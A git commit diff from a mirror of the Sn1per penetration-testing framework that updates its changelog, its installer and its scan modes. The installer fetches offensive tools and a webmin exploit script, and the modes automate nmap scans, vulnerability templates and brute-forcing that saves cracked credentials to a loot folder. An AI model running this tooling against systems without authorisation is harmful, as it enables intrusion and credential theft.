mirror of https://github.com/1N3/Sn1per.git
* v8.9 - Tuned sniper.conf around performance for all scans and recon modes
* v8.9 - Added out of scope options to config * v8.9 - Added automatic HTTP/HTTPS web scans and vulnerability scans to 'normal' mode * v8.9 - Added SolarWinds Orion Panel Default Credentials sc0pe template * v8.9 - Added SolarWinds Orion Panel sc0pe template * v8.9 - Fixed issue with theHarvester not running on Kali 2020.4 * v8.9 - Added WPScan API support * v8.9 - Added CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure sc0pe template * v8.9 - Added CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal sc0pe template * v8.9 - Removed verbose error for chromium on Ubuntu * v8.9 - Added CVE-2020-8209 - Citrix XenMobile Server Path Traversal sc0pe template * v8.9 - Fixed F+ in CSP Not Enforced sc0pe template * v8.9 - Added CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS sc0pe template * v8.9 - Fixed issue with dnscan not working in Kali 2020.3 * v8.9 - Fixed issue with screenshots not working in Ubuntu 2020 * v8.9 - Added Frontpage Service Password Disclosure sc0pe template * v8.9 - Removed Yasuo tool
This commit is contained in:
parent
1399d227ed
commit
d06a47fe62
17
CHANGELOG.md
17
CHANGELOG.md
|
|
@ -1,4 +1,21 @@
|
|||
## CHANGELOG:
|
||||
* v8.9 - Tuned sniper.conf around performance for all scans and recon modes
|
||||
* v8.9 - Added out of scope options to config
|
||||
* v8.9 - Added automatic HTTP/HTTPS web scans and vulnerability scans to 'normal' mode
|
||||
* v8.9 - Added SolarWinds Orion Panel Default Credentials sc0pe template
|
||||
* v8.9 - Added SolarWinds Orion Panel sc0pe template
|
||||
* v8.9 - Fixed issue with theHarvester not running on Kali 2020.4
|
||||
* v8.9 - Added WPScan API support
|
||||
* v8.9 - Added CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure sc0pe template
|
||||
* v8.9 - Added CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal sc0pe template
|
||||
* v8.9 - Removed verbose error for chromium on Ubuntu
|
||||
* v8.9 - Added CVE-2020-8209 - Citrix XenMobile Server Path Traversal sc0pe template
|
||||
* v8.9 - Fixed F+ in CSP Not Enforced sc0pe template
|
||||
* v8.9 - Added CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS sc0pe template
|
||||
* v8.9 - Fixed issue with dnscan not working in Kali 2020.3
|
||||
* v8.9 - Fixed issue with screenshots not working in Ubuntu 2020
|
||||
* v8.9 - Added Frontpage Service Password Disclosure sc0pe template
|
||||
* v8.9 - Removed Yasuo tool
|
||||
* v8.8 - Fixed issue with webscreenshot on Kali 2020.3+
|
||||
* v8.8 - Fixed error in install.sh for theharvester sym link
|
||||
* v8.8 - Fixed issue with flyover mode not capturing web screenshots
|
||||
|
|
|
|||
|
|
@ -496,12 +496,13 @@ time.sleep(5)
|
|||
# If you want to retrieve alerts:
|
||||
## pprint(zap.core.alerts(baseurl=target, start=None, count=None))
|
||||
|
||||
# To retrieve ZAP report in XML or HTML format
|
||||
## print('XML report')
|
||||
## core.xmlreport()
|
||||
print('HTML report:')
|
||||
pprint(core.htmlreport())
|
||||
|
||||
# To retrieve ZAP report in XML or HTML format
|
||||
print('XML report')
|
||||
pprint(core.xmlreport())
|
||||
|
||||
if shutdownOnceFinished:
|
||||
# Shutdown ZAP once finished
|
||||
pprint('Shutdown ZAP -> ' + core.shutdown())
|
||||
|
|
|
|||
110
conf/default
110
conf/default
File diff suppressed because one or more lines are too long
52
install.sh
52
install.sh
|
|
@ -30,7 +30,7 @@ if [[ "$1" != "force" ]]; then
|
|||
fi
|
||||
|
||||
if [[ $EUID -ne 0 ]]; then
|
||||
echo "This script must be run as root"
|
||||
echo "This script must be run as root"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
|
|
@ -59,7 +59,7 @@ UBUNTU_CHECK=$(egrep DISTRIB_ID /etc/lsb-release 2> /dev/null)
|
|||
if [[ $UBUNTU_CHECK == "DISTRIB_ID=Ubuntu" ]]; then
|
||||
cp /root/.Xauthority /root/.Xauthority.bak 2> /dev/null
|
||||
cp -a /run/user/1000/gdm/Xauthority /root/.Xauthority 2> /dev/null
|
||||
cp -a /home/user/.Xauthority /root/.Xauthority 2> /dev/null
|
||||
cp -a /home/user/.Xauthority /root/.Xauthority 2> /dev/null
|
||||
chown root /root/.Xauthority
|
||||
XAUTHORITY=/root/.Xauthority
|
||||
snap install chromium 2> /dev/null
|
||||
|
|
@ -109,9 +109,8 @@ apt-get install -y xmlstarlet
|
|||
apt-get install -y net-tools
|
||||
apt-get install -y p7zip-full
|
||||
apt-get install -y jsbeautifier
|
||||
apt-get install -y theharvester 2> /dev/null
|
||||
apt-get install -y phantomjs 2> /dev/null
|
||||
#apt-get install -y openvas
|
||||
#apt-get install -y greenbone-security-assistant
|
||||
apt-get install -y chromium 2> /dev/null
|
||||
|
||||
echo -e "$OKBLUE[*]$RESET Installing Metasploit...$RESET"
|
||||
|
|
@ -146,14 +145,14 @@ cd $PLUGINS_DIR
|
|||
mkdir -p $GO_DIR 2> /dev/null
|
||||
|
||||
echo -e "$OKBLUE[*]$RESET Downloading extensions...$RESET"
|
||||
git clone https://github.com/1N3/BruteX.git
|
||||
git clone https://github.com/1N3/Findsploit.git
|
||||
git clone https://github.com/1N3/BruteX.git
|
||||
git clone https://github.com/1N3/Findsploit.git
|
||||
git clone https://github.com/1N3/Goohak.git
|
||||
git clone https://github.com/1N3/BlackWidow
|
||||
git clone https://github.com/1N3/Sublist3r.git
|
||||
git clone https://github.com/nccgroup/shocker.git
|
||||
git clone https://github.com/nccgroup/shocker.git
|
||||
git clone https://github.com/BishopFox/spoofcheck.git
|
||||
git clone https://github.com/arthepsy/ssh-audit
|
||||
git clone https://github.com/arthepsy/ssh-audit
|
||||
git clone https://github.com/1N3/jexboss.git
|
||||
git clone https://github.com/maurosoria/dirsearch.git
|
||||
git clone https://github.com/jekyc/wig.git
|
||||
|
|
@ -162,24 +161,24 @@ git clone https://github.com/hisxo/gitGraber.git
|
|||
git clone https://github.com/1N3/LinkFinder
|
||||
git clone https://github.com/christophetd/censys-subdomain-finder.git
|
||||
git clone https://github.com/rbsec/dnscan.git
|
||||
git clone https://github.com/infosec-au/altdns.git
|
||||
git clone https://github.com/infosec-au/altdns.git
|
||||
git clone https://github.com/blechschmidt/massdns.git
|
||||
git clone https://github.com/ProjectAnte/dnsgen
|
||||
git clone https://github.com/scipag/vulscan
|
||||
git clone https://github.com/laramies/metagoofil.git
|
||||
git clone https://github.com/achillean/shodan-python
|
||||
git clone https://github.com/Dionach/CMSmap.git
|
||||
git clone https://github.com/Dionach/CMSmap.git
|
||||
git clone https://github.com/defparam/smuggler.git
|
||||
|
||||
cd LinkFinder
|
||||
python setup.py install
|
||||
python setup.py install
|
||||
cd ..
|
||||
pip3 install -r $PLUGINS_DIR/gitGraber/requirements.txt
|
||||
pip3 install -r $PLUGINS_DIR/censys-subdomain-finder/requirements.txt
|
||||
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
|
||||
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
|
||||
cd altdns
|
||||
pip3 install -r requirements.txt
|
||||
python2 setup.py install
|
||||
pip3 install -r requirements.txt
|
||||
python2 setup.py install
|
||||
pip3 install py-altdns 2> /dev/null
|
||||
cd ..
|
||||
cd massdns
|
||||
|
|
@ -227,27 +226,21 @@ wget https://raw.githubusercontent.com/1N3/Exploits/master/defcon_webmin_unauth_
|
|||
wget https://github.com/OJ/gobuster/releases/download/v3.0.1/gobuster-linux-amd64.7z -O /tmp/gobuster.7z
|
||||
cd /tmp/
|
||||
7z e gobuster.7z
|
||||
chmod +rx gobuster
|
||||
mv gobuster /usr/bin/gobuster
|
||||
chmod +rx gobuster
|
||||
mv gobuster /usr/bin/gobuster
|
||||
cd $PLUGINS_DIR
|
||||
cd shodan-python
|
||||
cd shodan-python
|
||||
python setup.py install
|
||||
cd ..
|
||||
pip3 install spyse.py
|
||||
pip3 install h8mail 2> /dev/null
|
||||
pip3 install h8mail 2> /dev/null
|
||||
cd $PLUGINS_DIR/CMSmap/ && pip3 install . && python3 setup.py install
|
||||
cd $PLUGINS_DIR
|
||||
|
||||
# THEHARVESTER MANUAL INSTALL
|
||||
wget https://github.com/laramies/theHarvester/archive/V3.1.tar.gz
|
||||
tar -zxvf V3.1.tar.gz
|
||||
rm V3.1.tar.gz
|
||||
ln -fs /usr/share/sniper/plugins/theHarvester-3.1/theHarvester.py /usr/bin/theharvester-3.1
|
||||
|
||||
# ARACHNI MANUAL INSTALL
|
||||
wget https://github.com/Arachni/arachni/releases/download/v1.5.1/arachni-1.5.1-0.5.12-linux-x86_64.tar.gz -O /tmp/arachni.tar.gz
|
||||
cd /tmp/
|
||||
tar -zxf arachni.tar.gz
|
||||
tar -zxf arachni.tar.gz
|
||||
rm -f /tmp/arachni.tar.gz 2> /dev/null
|
||||
cd arachni-*
|
||||
mkdir -p /usr/share/arachni 2> /dev/null
|
||||
|
|
@ -269,7 +262,7 @@ cd $PLUGINS_DIR/BruteX/ && bash install.sh 2> /dev/null
|
|||
cd $PLUGINS_DIR/Findsploit/ && bash install.sh 2> /dev/null
|
||||
cd $PLUGINS_DIR/spoofcheck/ && pip3 install -r requirements.txt 2> /dev/null
|
||||
|
||||
cd $INSTALL_DIR
|
||||
cd $INSTALL_DIR
|
||||
mkdir $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
|
||||
mkdir $LOOT_DIR/nmap -p 2> /dev/null
|
||||
|
|
@ -285,11 +278,14 @@ ln -s $INSTALL_DIR/sniper /usr/bin/sniper
|
|||
ln -s $PLUGINS_DIR/Goohak/goohak /usr/bin/goohak
|
||||
ln -s $PLUGINS_DIR/dirsearch/dirsearch.py /usr/bin/dirsearch
|
||||
ln -s /usr/share/sniper /sniper 2> /dev/null
|
||||
ln -s /usr/share/sniper /usr/share/sn1per 2> /dev/null
|
||||
ln -s /usr/share/sniper/loot/workspace /workspace 2> /dev/null
|
||||
ln -s /usr/share/sniper/loot/workspace /root/workspace 2> /dev/null
|
||||
ln -s /usr/share/sniper /root/sniper 2> /dev/null
|
||||
ln -s /root/.sniper.conf /usr/share/sniper/conf/sniper.conf
|
||||
ln -s /root/.sniper_api_keys.conf /usr/share/sniper/conf/sniper_api_keys.conf
|
||||
ln -s /root/.sniper.conf /usr/share/sniper/conf/sniper.conf 2> /dev/null
|
||||
ln -s /root/.sniper_api_keys.conf /usr/share/sniper/conf/sniper_api_keys.conf 2> /dev/null
|
||||
mv /root/.sniper.conf /root/.sniper.conf.bak 2> /dev/null
|
||||
cp -vf /usr/share/sniper/sniper.conf /root/.sniper.conf 2> /dev/null
|
||||
msfdb init 2> /dev/null
|
||||
|
||||
echo -e "$OKBLUE[*]$RESET Adding start menu and desktop shortcuts... $RESET"
|
||||
|
|
|
|||
|
|
@ -8,7 +8,7 @@ if [[ "$MODE" = "airstrike" ]]; then
|
|||
if [[ "$REPORT" = "1" ]]; then
|
||||
for a in `cat $FILE`;
|
||||
do
|
||||
if [[ "$AUTOBRUTE" = "1" ]]; then
|
||||
if [[ "$AUTO_BRUTE" = "1" ]]; then
|
||||
args="$args -b"
|
||||
fi
|
||||
if [[ "$FULLNMAPSCAN" = "1" ]]; then
|
||||
|
|
@ -61,9 +61,9 @@ if [[ "$MODE" = "airstrike" ]]; then
|
|||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
|
|
@ -74,9 +74,9 @@ if [[ "$MODE" = "airstrike" ]]; then
|
|||
args=""
|
||||
done
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
if [[ "$AUTOBRUTE" = "0" ]]; then
|
||||
if [[ "$AUTO_BRUTE" = "0" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SKIPPING BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -8,9 +8,9 @@ else
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
brutex $TARGET | tee $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null > $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null
|
||||
|
|
@ -29,8 +29,8 @@ else
|
|||
if [[ "$SLACK_NOTIFICATIONS_BRUTEFORCE" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/credentials/brutex-$TARGET.txt"
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
fi
|
||||
|
|
@ -18,9 +18,9 @@ if [[ "$MODE" = "discover" ]]; then
|
|||
OUT_FILE="$(echo $TARGET | tr / -)"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUT_FILE-$MODE.txt 2> /dev/null
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
|
|
@ -69,9 +69,9 @@ if [[ "$MODE" = "discover" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE
|
||||
exit
|
||||
|
|
|
|||
|
|
@ -40,46 +40,41 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
echo "$FILE $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${WORKSPACE}_${MODE}.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
args=""
|
||||
cp $LOOT_DIR/nmap/livehosts-sorted.txt $LOOT_DIR/nmap/livehosts-sorted.old 2> /dev/null
|
||||
i=1
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} Collecting DNS, ports, HTTP info and screenshots in background.${RESET}"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} All collected info will be saved to ${OKRED}${LOOT_DIR}${RESET}"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} FLYOVER_MAX_HOSTS=$FLYOVER_MAX_HOSTS ${RESET}"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} FLYOVER_DELAY=$FLYOVER_DELAY ${RESET}"
|
||||
|
||||
for HOST in `cat $FILE`; do
|
||||
TARGET="$HOST"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
|
||||
echo "sniper -t $TARGET -m $MODE $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
echo -e "${OKBLUE}HOST:$RESET $TARGET"
|
||||
echo "$TARGET" | httpx -ip -cdn -cname -title -content-length -status-code -silent -location -web-server 2> /dev/null
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKBLUE[*]$RESET SCANNING:$RESET $OKBLUE[$RESET${OKGREEN}${TARGET}${RESET}$OKBLUE]$RESET"
|
||||
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
sed -i -E 's/,//g' $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null &
|
||||
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-http-$TARGET.txt & 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
|
||||
curl --connect-timeout 5 -I -s -R --insecure http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
|
||||
curl --connect-timeout 5 -I -s -R --insecure https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
|
||||
|
||||
curl --connect-timeout 5 -s -R -L --insecure http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null &
|
||||
curl --connect-timeout 5 -s -R -L --insecure https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null &
|
||||
|
||||
webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null &
|
||||
webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null &
|
||||
|
||||
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
|
||||
nmap -sS -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
|
||||
|
||||
WEBHOST=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null | egrep "80|443" | grep open | wc -l 2> /dev/null)
|
||||
if [[ "$WEBHOST" -gt "0" ]]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
|
||||
|
|
@ -101,7 +96,6 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
fi
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets-all-presorted.txt
|
||||
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 2> /dev/null
|
||||
RUNNING_TASKS=$(wc -l $LOOT_DIR/scans/tasks-running.txt 2> /dev/null)
|
||||
|
|
@ -126,7 +120,6 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
|
||||
done
|
||||
|
||||
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
|
||||
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
|
||||
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
|
||||
|
|
@ -134,30 +127,34 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
|
||||
diff $LOOT_DIR/nmap/livehosts-sorted.old $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.diff 2> /dev/null
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]] && [[ -s "$LOOT_DIR/nmap/livehosts-sorted.diff" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Host status change detected on $WORKSPACE (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/livehosts-sorted.diff"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Host status change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/nmap/livehosts-sorted.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications.txt
|
||||
if [[ -s "$LOOT_DIR/nmap/livehosts-sorted.diff" ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Host status change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/nmap/livehosts-sorted.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Host status change detected on $WORKSPACE (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/livehosts-sorted.diff"
|
||||
fi
|
||||
fi
|
||||
|
